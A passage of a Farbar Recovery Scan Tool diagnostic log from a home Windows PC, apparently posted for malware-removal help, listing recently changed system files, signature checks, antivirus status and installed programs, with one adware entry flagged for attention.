2014-10-15 13:08 - 2014-10-10 13:05 - 00507392 _____ (Microsoft Corporation) C:\Windows\system32\aepdu.dll
2014-10-15 13:08 - 2014-10-10 13:05 - 00276480 _____ (Microsoft Corporation) C:\Windows\system32\generaltel.dll
2014-10-15 13:08 - 2014-10-10 13:00 - 00424448 _____ (Microsoft Corporation) C:\Windows\system32\aeinv.dll
2014-10-15 13:08 - 2014-10-07 13:54 - 00378552 _____ (Microsoft Corporation) C:\Windows\system32\iedkcs32.dll
2014-10-15 13:08 - 2014-10-07 13:04 - 00331448 _____ (Microsoft Corporation) C:\Windows\SysWOW64\iedkcs32.dll
2014-10-15 13:08 - 2014-09-26 09:50 - 13619200 _____ (Microsoft Corporation) C:\Windows\system32\ieframe.dll
2014-10-15 13:08 - 2014-09-26 09:46 - 00365056 _____ (Microsoft Corporation) C:\Windows\SysWOW64\dxtmsft.dll
2014-10-15 13:08 - 2014-09-26 09:46 - 00243200 _____ (Microsoft Corporation) C:\Windows\SysWOW64\dxtrans.dll
2014-10-15 13:08 - 2014-09-26 09:46 - 00069632 _____ (Microsoft Corporation) C:\Windows\SysWOW64\mshtmled.dll
2014-10-15 13:08 - 2014-09-26 09:43 - 11807232 _____ (Microsoft Corporation) C:\Windows\SysWOW64\ieframe.dll
2014-10-15 13:08 - 2014-09-26 09:32 - 02017280 _____ (Microsoft Corporation) C:\Windows\SysWOW64\inetcpl.cpl
2014-10-15 13:08 - 2014-09-26 09:31 - 02108416 _____ (Microsoft Corporation) C:\Windows\system32\inetcpl.cpl
2014-10-15 13:08 - 2014-09-19 13:25 - 23631360 _____ (Microsoft Corporation) C:\Windows\system32\mshtml.dll
2014-10-15 13:08 - 2014-09-19 12:56 - 02724864 _____ (Microsoft Corporation) C:\Windows\system32\mshtml.tlb
2014-10-15 13:08 - 2014-09-19 12:55 - 00004096 _____ (Microsoft Corporation) C:\Windows\system32\ieetwcollectorres.dll
2014-10-15 13:08 - 2014-09-19 12:44 - 17484800 _____ (Microsoft Corporation) C:\Windows\SysWOW64\mshtml.dll
2014-10-15 13:08 - 2014-09-19 12:41 - 02796032 _____ (Microsoft Corporation) C:\Windows\system32\iertutil.dll
2014-10-15 13:08 - 2014-09-19 12:40 - 00547328 _____ (Microsoft Corporation) C:\Windows\system32\vbscript.dll
2014-10-15 13:08 - 2014-09-19 12:40 - 00066048 _____ (Microsoft Corporation) C:\Windows\system32\iesetup.dll
2014-10-15 13:08 - 2014-09-19 12:39 - 00048640 _____ (Microsoft Corporation) C:\Windows\system32\ieetwproxystub.dll
2014-10-15 13:08 - 2014-09-19 12:38 - 00083968 _____ (Microsoft Corporation) C:\Windows\system32\MshtmlDac.dll
2014-10-15 13:08 - 2014-09-19 12:36 - 05829632 _____ (Microsoft Corporation) C:\Windows\system32\jscript9.dll
2014-10-15 13:08 - 2014-09-19 12:31 - 00051200 _____ (Microsoft Corporation) C:\Windows\system32\jsproxy.dll
2014-10-15 13:08 - 2014-09-19 12:30 - 00033792 _____ (Microsoft Corporation) C:\Windows\system32\iernonce.dll
2014-10-15 13:08 - 2014-09-19 12:27 - 00595968 _____ (Microsoft Corporation) C:\Windows\system32\ieui.dll
2014-10-15 13:08 - 2014-09-19 12:26 - 00139264 _____ (Microsoft Corporation) C:\Windows\system32\ieUnatt.exe
2014-10-15 13:08 - 2014-09-19 12:25 - 04201472 _____ (Microsoft Corporation) C:\Windows\SysWOW64\jscript9.dll
2014-10-15 13:08 - 2014-09-19 12:25 - 00758272 _____ (Microsoft Corporation) C:\Windows\system32\jscript9diag.dll
2014-10-15 13:08 - 2014-09-19 12:25 - 00111616 _____ (Microsoft Corporation) C:\Windows\system32\ieetwcollector.exe
2014-10-15 13:08 - 2014-09-19 12:18 - 00940032 _____ (Microsoft Corporation) C:\Windows\system32\MsSpellCheckingFacility.exe
2014-10-15 13:08 - 2014-09-19 12:14 - 02724864 _____ (Microsoft Corporation) C:\Windows\SysWOW64\mshtml.tlb
2014-10-15 13:08 - 2014-09-19 12:14 - 00446464 _____ (Microsoft Corporation) C:\Windows\system32\dxtmsft.dll
2014-10-15 13:08 - 2014-09-19 12:06 - 00072704 _____ (Microsoft Corporation) C:\Windows\system32\JavaScriptCollectionAgent.dll
2014-10-15 13:08 - 2014-09-19 12:02 - 00454656 _____ (Microsoft Corporation) C:\Windows\SysWOW64\vbscript.dll
2014-10-15 13:08 - 2014-09-19 12:01 - 00195584 _____ (Microsoft Corporation) C:\Windows\system32\msrating.dll
2014-10-15 13:08 - 2014-09-19 12:01 - 00061952 _____ (Microsoft Corporation) C:\Windows\SysWOW64\iesetup.dll
2014-10-15 13:08 - 2014-09-19 12:01 - 00051200 _____ (Microsoft Corporation) C:\Windows\SysWOW64\ieetwproxystub.dll
2014-10-15 13:08 - 2014-09-19 12:00 - 00085504 _____ (Microsoft Corporation) C:\Windows\system32\mshtmled.dll
2014-10-15 13:08 - 2014-09-19 11:59 - 00061952 _____ (Microsoft Corporation) C:\Windows\SysWOW64\MshtmlDac.dll
2014-10-15 13:08 - 2014-09-19 11:58 - 00289280 _____ (Microsoft Corporation) C:\Windows\system32\dxtrans.dll
2014-10-15 13:08 - 2014-09-19 11:55 - 02187264 _____ (Microsoft Corporation) C:\Windows\SysWOW64\iertutil.dll
2014-10-15 13:08 - 2014-09-19 11:54 - 00043008 _____ (Microsoft Corporation) C:\Windows\SysWOW64\jsproxy.dll
2014-10-15 13:08 - 2014-09-19 11:53 - 00032768 _____ (Microsoft Corporation) C:\Windows\SysWOW64\iernonce.dll
2014-10-15 13:08 - 2014-09-19 11:51 - 00440320 _____ (Microsoft Corporation) C:\Windows\SysWOW64\ieui.dll
2014-10-15 13:08 - 2014-09-19 11:50 - 00112128 _____ (Microsoft Corporation) C:\Windows\SysWOW64\ieUnatt.exe
2014-10-15 13:08 - 2014-09-19 11:49 - 00597504 _____ (Microsoft Corporation) C:\Windows\SysWOW64\jscript9diag.dll
2014-10-15 13:08 - 2014-09-19 11:42 - 00731136 _____ (Microsoft Corporation) C:\Windows\system32\msfeeds.dll
2014-10-15 13:08 - 2014-09-19 11:42 - 00710656 _____ (Microsoft Corporation) C:\Windows\system32\ie4uinit.exe
2014-10-15 13:08 - 2014-09-19 11:40 - 01249280 _____ (Microsoft Corporation) C:\Windows\system32\mshtmlmedia.dll
2014-10-15 13:08 - 2014-09-19 11:36 - 00060416 _____ (Microsoft Corporation) C:\Windows\SysWOW64\JavaScriptCollectionAgent.dll
2014-10-15 13:08 - 2014-09-19 11:33 - 02309632 _____ (Microsoft Corporation) C:\Windows\system32\wininet.dll
2014-10-15 13:08 - 2014-09-19 11:32 - 00164864 _____ (Microsoft Corporation) C:\Windows\SysWOW64\msrating.dll
2014-10-15 13:08 - 2014-09-19 11:20 - 00607744 _____ (Microsoft Corporation) C:\Windows\SysWOW64\msfeeds.dll
2014-10-15 13:08 - 2014-09-19 11:18 - 01068032 _____ (Microsoft Corporation) C:\Windows\SysWOW64\mshtmlmedia.dll
2014-10-15 13:08 - 2014-09-19 11:14 - 01447936 _____ (Microsoft Corporation) C:\Windows\system32\urlmon.dll
2014-10-15 13:08 - 2014-09-19 10:59 - 01810944 _____ (Microsoft Corporation) C:\Windows\SysWOW64\wininet.dll
2014-10-15 13:08 - 2014-09-19 10:59 - 00775168 _____ (Microsoft Corporation) C:\Windows\system32\ieapfltr.dll
2014-10-15 13:08 - 2014-09-19 10:53 - 01190400 _____ (Microsoft Corporation) C:\Windows\SysWOW64\urlmon.dll
2014-10-15 13:08 - 2014-09-19 10:52 - 00678400 _____ (Microsoft Corporation) C:\Windows\SysWOW64\ieapfltr.dll
2014-10-15 13:07 - 2014-09-18 13:00 - 03241472 _____ (Microsoft Corporation) C:\Windows\system32\msi.dll
2014-10-15 13:07 - 2014-09-18 12:32 - 02363904 _____ (Microsoft Corporation) C:\Windows\SysWOW64\msi.dll
2014-10-15 13:07 - 2014-09-13 12:58 - 00077312 _____ (Microsoft Corporation) C:\Windows\system32\packager.dll
2014-10-15 13:07 - 2014-09-13 12:40 - 00067072 _____ (Microsoft Corporation) C:\Windows\SysWOW64\packager.dll
2014-10-15 13:07 - 2014-09-04 16:23 - 00424448 _____ (Microsoft Corporation) C:\Windows\system32\rastls.dll
2014-10-15 13:07 - 2014-09-04 16:04 - 00372736 _____ (Microsoft Corporation) C:\Windows\SysWOW64\rastls.dll
2014-10-15 13:07 - 2014-07-17 13:07 - 03722240 _____ (Microsoft Corporation) C:\Windows\system32\mstscax.dll
2014-10-15 13:07 - 2014-07-17 13:07 - 01118720 _____ (Microsoft Corporation) C:\Windows\system32\mstsc.exe
2014-10-15 13:07 - 2014-07-17 13:07 - 00681984 _____ (Microsoft Corporation) C:\Windows\system32\termsrv.dll
2014-10-15 13:07 - 2014-07-17 13:07 - 00455168 _____ (Microsoft Corporation) C:\Windows\system32\winlogon.exe
2014-10-15 13:07 - 2014-07-17 13:07 - 00235520 _____ (Microsoft Corporation) C:\Windows\system32\winsta.dll
2014-10-15 13:07 - 2014-07-17 13:07 - 00150528 _____ (Microsoft Corporation) C:\Windows\system32\rdpcorekmts.dll
2014-10-15 13:07 - 2014-07-17 13:07 - 00086528 _____ (Microsoft Corporation) C:\Windows\system32\TSpkg.dll
2014-10-15 13:07 - 2014-07-17 13:07 - 00022016 _____ (Microsoft Corporation) C:\Windows\system32\credssp.dll
2014-10-15 13:07 - 2014-07-17 12:40 - 00157696 _____ (Microsoft Corporation) C:\Windows\SysWOW64\winsta.dll
2014-10-15 13:07 - 2014-07-17 12:39 - 03221504 _____ (Microsoft Corporation) C:\Windows\SysWOW64\mstscax.dll
2014-10-15 13:07 - 2014-07-17 12:39 - 01051136 _____ (Microsoft Corporation) C:\Windows\SysWOW64\mstsc.exe
2014-10-15 13:07 - 2014-07-17 12:39 - 00131584 _____ (Microsoft Corporation) C:\Windows\SysWOW64\aaclient.dll
2014-10-15 13:07 - 2014-07-17 12:39 - 00065536 _____ (Microsoft Corporation) C:\Windows\SysWOW64\TSpkg.dll
2014-10-15 13:07 - 2014-07-17 12:39 - 00017408 _____ (Microsoft Corporation) C:\Windows\SysWOW64\credssp.dll
2014-10-15 13:07 - 2014-07-17 12:21 - 00212480 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\rdpwd.sys
2014-10-15 13:07 - 2014-07-17 12:21 - 00039936 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\tssecsrv.sys
2014-10-14 21:36 - 2014-10-14 21:36 - 00000052 _____ () C:\Users\Mitey Fresh\Desktop\geoguesser.txt
2014-10-12 22:27 - 2014-10-16 12:12 - 00000652 _____ () C:\Users\Mitey Fresh\Desktop\cruise holiday.txt
2014-10-10 13:08 - 2014-10-10 15:14 - 00062372 _____ () C:\Users\Mitey Fresh\Downloads\Extras.Txt
2014-10-10 13:07 - 2014-10-14 16:34 - 00215754 _____ () C:\Users\Mitey Fresh\Downloads\OTL.Txt
2014-10-10 12:57 - 2014-10-10 12:58 - 00602112 _____ (OldTimer Tools) C:\Users\Mitey Fresh\Downloads\OTL.exe
2014-10-01 14:52 - 2014-10-02 13:43 - 00000000 ____D () C:\Users\Mitey Fresh\AppData\Roaming\sweet-page
2014-10-01 14:51 - 2014-10-01 14:54 - 00000000 ____D () C:\Users\Mitey Fresh\AppData\Local\WinZip
2014-10-01 14:51 - 2014-10-01 14:54 - 00000000 ____D () C:\ProgramData\WinZip
2014-10-01 14:51 - 2014-10-01 14:51 - 00002293 _____ () C:\ProgramData\Microsoft\Windows\Start Menu\WinZip.lnk
2014-10-01 14:51 - 2014-10-01 14:51 - 00000000 ____D () C:\ProgramData\Microsoft\Windows\Start Menu\Programs\WinZip
2014-10-01 14:50 - 2014-10-01 14:51 - 00000000 ____D () C:\Program Files\WinZip
2014-10-01 14:49 - 2014-10-01 14:49 - 00873680 _____ ( ) C:\Users\Mitey Fresh\Downloads\winzip18-home (2).exe
2014-10-01 14:06 - 2014-10-01 14:07 - 17292760 _____ (Malwarebytes Corporation ) C:\Users\Mitey Fresh\Downloads\mbam-setup-2.0.2.1012 (2).exe
2014-10-01 14:06 - 2014-10-01 14:06 - 17292760 _____ (Malwarebytes Corporation ) C:\Users\Mitey Fresh\Downloads\mbam-setup-2.0.2.1012 (1).exe
2014-10-01 13:00 - 2014-10-01 13:01 - 17292760 _____ (Malwarebytes Corporation ) C:\Users\Mitey Fresh\Downloads\mbam-setup-2.0.2.1012.exe
2014-10-01 09:33 - 2014-09-25 13:08 - 00371712 _____ (Microsoft Corporation) C:\Windows\system32\qdvd.dll
2014-10-01 09:33 - 2014-09-25 12:40 - 00519680 _____ (Microsoft Corporation) C:\Windows\SysWOW64\qdvd.dll
2014-09-30 17:15 - 2014-10-09 09:03 - 00000000 ____D () C:\Users\Mitey Fresh\Desktop\Mitey Shield video
2014-09-30 17:07 - 2014-09-30 17:07 - 00000000 ____D () C:\Users\Mitey Fresh\Documents\iSkysoft Video Converter Ultimate
2014-09-30 17:07 - 2014-09-30 17:07 - 00000000 ____D () C:\Users\Mitey Fresh\AppData\Roaming\{950EB46C-6AC7-4ACC-AB36-9A6A77C08B6A}
2014-09-30 17:07 - 2014-09-30 17:07 - 00000000 ____D () C:\Users\Mitey Fresh\AppData\Local\iSkysoft
2014-09-30 17:07 - 2014-09-30 17:07 - 00000000 ____D () C:\ProgramData\Microsoft\Windows\Start Menu\Programs\iSkysoft
2014-09-30 17:06 - 2014-09-30 17:12 - 00000000 ____D () C:\ProgramData\iSkysoft Video Converter Ultimate
2014-09-30 17:06 - 2014-09-30 17:07 - 00000000 ____D () C:\ProgramData\iSkysoft
2014-09-30 17:06 - 2014-09-30 17:06 - 00000000 ____D () C:\Program Files (x86)\iSkysoft
2014-09-30 17:06 - 2013-08-23 14:36 - 00721263 _____ () C:\Windows\SysWOW64\ISCM64.dll
2014-09-30 17:06 - 2013-08-07 15:31 - 00214528 _____ () C:\Windows\SysWOW64\ISCM32.dll
2014-09-30 17:05 - 2014-09-30 17:05 - 00000000 ____D () C:\Users\Public\Documents\iSkysoft
2014-09-30 17:04 - 2014-09-30 17:05 - 01347936 _____ (iSkysoft) C:\Users\Mitey Fresh\Downloads\video-converter-ultimate-win_setup_full670.exe
2014-09-29 21:19 - 2014-09-29 21:20 - 00262144 _____ () C:\Windows\Minidump\092914-17940-01.dmp
2014-09-29 19:47 - 2014-09-30 17:12 - 00076441 _____ () C:\Users\Mitey Fresh\Desktop\Mitey Shield videos.wlmp
2014-09-24 13:04 - 2014-09-10 09:11 - 00002048 _____ (Microsoft Corporation) C:\Windows\system32\tzres.dll
2014-09-24 13:04 - 2014-09-10 08:47 - 00002048 _____ (Microsoft Corporation) C:\Windows\SysWOW64\tzres.dll
2014-09-22 18:48 - 2014-09-29 16:37 - 00000000 ____D () C:\Users\Mitey Fresh\AppData\Roaming\vlc
2014-09-22 18:46 - 2014-09-22 18:47 - 00000000 ____D () C:\Program Files (x86)\VLC
2014-09-22 18:45 - 2014-09-22 18:46 - 24743106 _____ () C:\Users\Mitey Fresh\Downloads\vlc-2.1.5-win32.exe
2014-09-19 12:42 - 2014-09-19 12:42 - 00332782 _____ () C:\Users\Mitey Fresh\Downloads\export (9).wav
2014-09-19 12:40 - 2014-09-19 12:41 - 00383026 _____ () C:\Users\Mitey Fresh\Downloads\export (8).wav
2014-09-19 12:35 - 2014-09-19 12:35 - 00386092 _____ () C:\Users\Mitey Fresh\Downloads\169905__lauriesafari__reallyareyoukidding.wav
2014-09-19 12:22 - 2014-09-19 12:22 - 00354138 _____ () C:\Users\Mitey Fresh\Downloads\export (7).wav
2014-09-18 18:13 - 2014-09-18 18:13 - 00354690 _____ () C:\Users\Mitey Fresh\Downloads\export (6).wav
2014-09-18 18:08 - 2014-09-18 18:08 - 00353600 _____ () C:\Users\Mitey Fresh\Downloads\export (5).wav
2014-09-18 18:05 - 2014-09-18 18:05 - 00391048 _____ () C:\Users\Mitey Fresh\Downloads\export (4).wav
2014-09-18 18:02 - 2014-09-18 18:02 - 00353230 _____ () C:\Users\Mitey Fresh\Downloads\export (3).wav
2014-09-18 18:00 - 2014-09-18 18:00 - 00354016 _____ () C:\Users\Mitey Fresh\Downloads\export (2).wav
2014-09-18 17:58 - 2014-09-18 17:58 - 00570378 _____ () C:\Users\Mitey Fresh\Downloads\232115__tec-studios__electronic-pounding-sound-mono (1).wav
2014-09-18 17:50 - 2014-09-18 17:52 - 00469382 _____ () C:\Users\Mitey Fresh\Downloads\35622__fresco__running-water-tap-by-fresco.wav
2014-09-18 17:43 - 2014-09-18 17:43 - 00395790 _____ () C:\Users\Mitey Fresh\Downloads\export (1).wav
2014-09-18 17:01 - 2014-09-18 17:01 - 00354976 _____ () C:\Users\Mitey Fresh\Downloads\export.wav
2014-09-18 15:02 - 2014-09-18 15:02 - 00048140 _____ () C:\Users\Mitey Fresh\Downloads\50775__smcameron__drips2.ogg
2014-09-17 09:37 - 2014-09-26 13:08 - 00000004 _____ () C:\Users\Mitey Fresh\AppData\Roaming\appdataFr2.bin
 
==================== One Month Modified Files and Folders =======
 
(If an entry is included in the fixlist, the file\folder will be moved.)
 
2014-10-17 08:28 - 2013-03-27 17:06 - 00000830 _____ () C:\Windows\Tasks\Adobe Flash Player Updater.job
2014-10-17 08:18 - 2013-03-26 15:55 - 01670506 _____ () C:\Windows\WindowsUpdate.log
2014-10-17 08:15 - 2014-02-25 16:36 - 00000908 _____ () C:\Windows\Tasks\GoogleUpdateTaskMachineUA.job
2014-10-17 08:10 - 2013-03-18 19:16 - 00365056 _____ () C:\Users\Mitey Fresh\Desktop\Food diary.xls
2014-10-17 08:09 - 2014-03-06 10:57 - 00000598 _____ () C:\Windows\Tasks\G2MUpdateTask-S-1-5-21-2275511576-419542734-2349628481-1000.job
2014-10-17 08:08 - 2009-07-14 15:45 - 00024048 ____H () C:\Windows\system32\7B296FB0-376B-497e-B012-9C450E1B7327-5P-1.C7483456-A289-439d-8115-601632D005A0
2014-10-17 08:08 - 2009-07-14 15:45 - 00024048 ____H () C:\Windows\system32\7B296FB0-376B-497e-B012-9C450E1B7327-5P-0.C7483456-A289-439d-8115-601632D005A0
2014-10-17 08:05 - 2009-07-14 16:13 - 00006206 _____ () C:\Windows\system32\PerfStringBackup.INI
2014-10-17 08:01 - 2014-02-24 08:03 - 00000000 ____D () C:\Users\Mitey Fresh\AppData\Local\LogMeIn Hamachi
2014-10-17 08:00 - 2014-02-25 16:36 - 00000904 _____ () C:\Windows\Tasks\GoogleUpdateTaskMachineCore.job
2014-10-17 08:00 - 2013-03-27 16:54 - 00435066 _____ () C:\Windows\PFRO.log
2014-10-17 08:00 - 2009-07-14 16:08 - 00000006 ____H () C:\Windows\Tasks\SA.DAT
2014-10-17 08:00 - 2009-07-14 15:51 - 00104831 _____ () C:\Windows\setupact.log
2014-10-16 22:09 - 2013-03-31 13:16 - 00000000 ____D () C:\Users\Mitey Fresh\AppData\Roaming\Spotify
2014-10-16 18:00 - 2009-07-14 14:20 - 00000000 ____D () C:\Windows\LiveKernelReports
2014-10-16 14:15 - 2014-01-01 16:28 - 00000000 ____D () C:\AdwCleaner
2014-10-16 13:45 - 2013-10-05 13:02 - 00001169 _____ () C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Mozilla Firefox.lnk
2014-10-16 13:45 - 2013-03-26 16:47 - 00001423 _____ () C:\Users\Mitey Fresh\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Internet Explorer.lnk
2014-10-16 11:13 - 2014-05-07 20:59 - 00000000 ___SD () C:\Windows\system32\CompatTel
2014-10-16 00:18 - 2013-07-26 10:21 - 00000000 ____D () C:\Windows\system32\MRT
2014-10-16 00:18 - 2013-03-26 18:30 - 103265616 _____ (Microsoft Corporation) C:\Windows\system32\MRT.exe
2014-10-15 23:11 - 2013-03-31 13:17 - 00000000 ____D () C:\Users\Mitey Fresh\AppData\Local\Spotify
2014-10-15 16:14 - 2011-07-29 11:08 - 00000000 ____D () C:\Users\Mitey Fresh\Desktop\Kirra's
2014-10-12 22:10 - 2014-03-06 10:57 - 00003636 _____ () C:\Windows\System32\Tasks\G2MUpdateTask-S-1-5-21-2275511576-419542734-2349628481-1000
2014-10-10 11:45 - 2013-08-08 12:43 - 00000000 ____D () C:\Users\Mitey Fresh\AppData\Roaming\AUSkey
2014-10-08 16:29 - 2014-02-25 16:37 - 00002350 _____ () C:\Users\Public\Desktop\Google Chrome.lnk
2014-10-08 15:41 - 2014-07-03 20:30 - 00013312 ___SH () C:\Users\Mitey Fresh\Downloads\Thumbs.db
2014-10-02 17:52 - 2013-03-29 14:54 - 00002547 _____ () C:\Users\Mitey Fresh\Desktop\`Staff Computer - Shortcut.lnk
2014-10-01 19:06 - 2009-07-14 14:20 - 00000000 ____D () C:\Windows\system32\NDF
2014-10-01 14:46 - 2009-07-14 16:32 - 00000000 ____D () C:\Windows\Offline Web Pages
2014-10-01 14:08 - 2014-01-01 17:17 - 00000000 ____D () C:\Users\Mitey Fresh\AppData\Roaming\Malwarebytes
2014-10-01 14:08 - 2014-01-01 17:17 - 00000000 ____D () C:\ProgramData\Malwarebytes
2014-09-29 21:19 - 2013-03-28 16:08 - 433221317 _____ () C:\Windows\MEMORY.DMP
2014-09-29 21:19 - 2013-03-28 16:08 - 00000000 ____D () C:\Windows\Minidump
2014-09-25 19:37 - 2013-04-29 18:16 - 00000000 ____D () C:\Users\Mitey Fresh\AppData\Roaming\Skype
2014-09-25 09:42 - 2009-07-14 14:20 - 00000000 ____D () C:\Windows\rescache
2014-09-24 20:48 - 2013-03-27 17:06 - 00701104 _____ (Adobe Systems Incorporated) C:\Windows\SysWOW64\FlashPlayerApp.exe
2014-09-24 20:48 - 2013-03-27 17:06 - 00071344 _____ (Adobe Systems Incorporated) C:\Windows\SysWOW64\FlashPlayerCPLApp.cpl
2014-09-24 20:48 - 2013-03-27 17:06 - 00003768 _____ () C:\Windows\System32\Tasks\Adobe Flash Player Updater
2014-09-22 17:42 - 2013-03-26 17:09 - 00278152 ____N (Microsoft Corporation) C:\Windows\system32\MpSigStub.exe
2014-09-19 12:43 - 2013-05-28 17:24 - 00013824 _____ () C:\Users\Mitey Fresh\AppData\Local\DCBC2A71-70D8-4DAN-EHR8-E0D61DEA3FDF.ini
2014-09-17 09:41 - 2013-12-30 10:48 - 00000000 ____D () C:\ProgramData\9922f00edb3be824
 
Some content of TEMP:
====================
C:\Users\Mitey Fresh\AppData\Local\Temp\sqlite3.dll
 
 
==================== Bamital & volsnap Check =================
 
(There is no automatic fix for files that do not pass verification.)
 
C:\Windows\System32\winlogon.exe => File is digitally signed
C:\Windows\System32\wininit.exe => File is digitally signed
C:\Windows\SysWOW64\wininit.exe => File is digitally signed
C:\Windows\explorer.exe => File is digitally signed
C:\Windows\SysWOW64\explorer.exe => File is digitally signed
C:\Windows\System32\svchost.exe => File is digitally signed
C:\Windows\SysWOW64\svchost.exe => File is digitally signed
C:\Windows\System32\services.exe => File is digitally signed
C:\Windows\System32\User32.dll => File is digitally signed
C:\Windows\SysWOW64\User32.dll => File is digitally signed
C:\Windows\System32\userinit.exe => File is digitally signed
C:\Windows\SysWOW64\userinit.exe => File is digitally signed
C:\Windows\System32\rpcss.dll => File is digitally signed
C:\Windows\System32\Drivers\volsnap.sys => File is digitally signed
 
 
LastRegBack: 2014-10-16 21:12
 
==================== End Of Log ============================
 
Here's the Addition.txt log:
 
Additional scan result of Farbar Recovery Scan Tool (x64) Version: 16-10-2014
Ran by Mitey Fresh at 2014-10-17 08:49:28
Running from C:\Users\Mitey Fresh\Desktop\Kirra's\Documents\Virus scans
Boot Mode: Normal
==========================================================
 
 
==================== Security Center ========================
 
(If an entry is included in the fixlist, it will be removed.)
 
AV: Microsoft Security Essentials (Enabled - Up to date) {4F35CFC4-45A3-FC37-EF17-759A02E39AB1}
AS: Microsoft Security Essentials (Enabled - Up to date) {F4542E20-6399-F3B9-D5A7-4EE87964D00C}
AS: Windows Defender (Disabled - Up to date) {D68DDC3A-831F-4fae-9E44-DA132C1ACF46}
 
==================== Installed Programs ======================
 
(Only the adware programs with "hidden" flag could be added to the fixlist to unhide them. The adware programs should be uninstalled manually.)
 
Adobe AIR (HKLM-x32\...\Adobe AIR) (Version: 3.9.0.1210 - Adobe Systems Incorporated)
Adobe AIR (x32 Version: 3.9.0.1210 - Adobe Systems Incorporated) Hidden
Adobe Flash Player 15 ActiveX (HKLM-x32\...\Adobe Flash Player ActiveX) (Version: 15.0.0.167 - Adobe Systems Incorporated)
Adobe Flash Player 15 Plugin (HKLM-x32\...\Adobe Flash Player Plugin) (Version: 15.0.0.152 - Adobe Systems Incorporated)
Adobe Reader XI (11.0.07) (HKLM-x32\...\{AC76BA86-7AD7-1033-7B44-AB0000000001}) (Version: 11.0.07 - Adobe Systems Incorporated)
Adobe Shockwave Player 12.0 (HKLM-x32\...\Adobe Shockwave Player) (Version: 12.0.0.112 - Adobe Systems, Inc.)
AGEIA PhysX v7.11.13 (HKLM-x32\...\{95FC26FB-19FD-4A96-BBB1-B1062E8648F5}) (Version: 7.11.13 - AGEIA Technologies, Inc.)
AUSkey software 1.4.4 (HKLM-x32\...\{24D37B30-83B4-46A7-A691-30F2FCEAE58E}) (Version: 1.4.4 - ABR)
Browser AdBlocker (HKLM-x32\...\{37476589-E48E-439E-A706-56189E2ED4C4}_is1) (Version:  - Browser AdBlocker) <==== ATTENTION
calibre (HKLM-x32\...\{E0601182-5F00-4513-95D0-AFDCB7A0C658}) (Version: 1.41.0 - Kovid Goyal)
Citrix Online Launcher (HKLM-x32\...\{AC7E7905-8C59-4806-A96D-30936A2B1FC5}) (Version: 1.0.168 - Citrix)
Compatibility Pack for the 2007 Office system (HKLM-x32\...\{90120000-0020-0409-0000-0000000FF1CE}) (Version: 12.0.6612.1000 - Microsoft Corporation)
D3DX10 (x32 Version: 15.4.2368.0902 - Microsoft) Hidden
DAEMON Tools Lite (HKLM-x32\...\DAEMON Tools Lite) (Version: 4.48.1.0347 - Disc Soft Ltd)
ECI Client v6.0 (HKLM-x32\...\{DE730F37-A198-4112-A3B6-97786F34354A}) (Version: v6.0.1 - Australian Taxation Office)
Fallout 3 (HKLM-x32\...\{974C4B12-4D02-4879-85E0-61C95CC63E9E}) (Version: 1.00.0000 - Bethesda Softworks)
Fallout New Vegas Ultimate Edition (HKLM-x32\...\Fallout New Vegas Ultimate Edition_is1) (Version:  - )
File Association Helper (HKLM\...\{C168639F-5810-4EC8-B1E8-0251AA8A771C}) (Version: 1.2.225.65451 - WinZip Computing International, LLC)
Google Chrome (HKLM-x32\...\Google Chrome) (Version: 33.0.1750.117 - Google Inc.)
Google Drive (HKLM-x32\...\{418BAAD1-754D-48B4-B078-46EF4F25AF42}) (Version: 1.15.6556.8063 - Google, Inc.)
GoToMeeting 6.4.4.1831 (HKCU\...\GoToMeeting) (Version: 6.4.4.1831 - CitrixOnline)
iSkysoft Video Converter Ultimate(Build 5.4.1.0) (HKLM-x32\...\iSkysoft Video Converter Ultimate_is1) (Version: 5.4.1.0 - iSkysoft Software)
Java 7 Update 17 (64-bit) (HKLM\...\{26A24AE4-039D-4CA4-87B4-2F86417017FF}) (Version: 7.0.170 - Oracle)
Java 7 Update 65 (HKLM-x32\...\{26A24AE4-039D-4CA4-87B4-2F83217017FF}) (Version: 7.0.650 - Oracle)
Java Auto Updater (x32 Version: 2.1.65.20 - Oracle, Inc.) Hidden
Jing (HKLM-x32\...\{22800204-9E53-45C7-B6F3-5BB0F1C1A147}) (Version: 2.8.13007.1 - TechSmith Corporation)
LogMeIn Hamachi (HKLM-x32\...\LogMeIn Hamachi) (Version: 2.2.0.236 - LogMeIn, Inc.)
LogMeIn Hamachi (x32 Version: 2.2.0.236 - LogMeIn, Inc.) Hidden
Lost Via Domus (HKLM-x32\...\{2702B8FC-6003-4AC6-ADBC-EC65746D800A}) (Version: 1.0 - Ubisoft)
Microsoft .NET Framework 4.5.1 (HKLM\...\{92FB6C44-E685-45AD-9B20-CADF4CABA132} - 1033) (Version: 4.5.50938 - Microsoft Corporation)
Microsoft .NET Framework 4.5.1 (Version: 4.5.50938 - Microsoft Corporation) Hidden
Microsoft Application Error Reporting (Version: 12.0.6015.5000 - Microsoft Corporation) Hidden
Microsoft Corporation (Version: 9.1.0.0 - Microsoft Corporation) Hidden
Microsoft Corporation (x32 Version: 9.1.0.0 - Microsoft Corporation) Hidden
Microsoft Games for Windows - LIVE Redistributable (HKLM-x32\...\{832D9DE0-8AFC-4689-9819-4DBBDEBD3E4F}) (Version: 3.5.92.0 - Microsoft Corporation)
Microsoft Games for Windows Marketplace (HKLM-x32\...\{67F42018-F647-4D3C-BE62-F8CB4FE2FCD5}) (Version: 3.5.67.0 - Microsoft Corporation)
Microsoft LifeCam (HKLM\...\{6965A8D2-465D-4F98-9FAA-0E9E2348F329}) (Version: 3.22.270.0 - Microsoft Corporation)
Microsoft Office File Validation Add-In (HKLM-x32\...\{90140000-2005-0000-0000-0000000FF1CE}) (Version: 14.0.5130.5003 - Microsoft Corporation)
Microsoft Office Professional Edition 2003 (HKLM-x32\...\{91110409-6000-11D3-8CFE-0150048383C9}) (Version: 11.0.8173.0 - Microsoft Corporation)
Microsoft Security Client (Version: 4.6.0305.0 - Microsoft Corporation) Hidden
Microsoft Security Essentials (HKLM\...\Microsoft Security Client) (Version: 4.6.305.0 - Microsoft Corporation)
Microsoft Silverlight (HKLM\...\{89F4137D-6C26-4A84-BDB8-2E5A4BB71E00}) (Version: 5.1.30514.0 - Microsoft Corporation)
Microsoft SQL Server 2005 Compact Edition [ENU] (HKLM-x32\...\{F0B430D1-B6AA-473D-9B06-AA3DD01FD0B8}) (Version: 3.1.0000 - Microsoft Corporation)
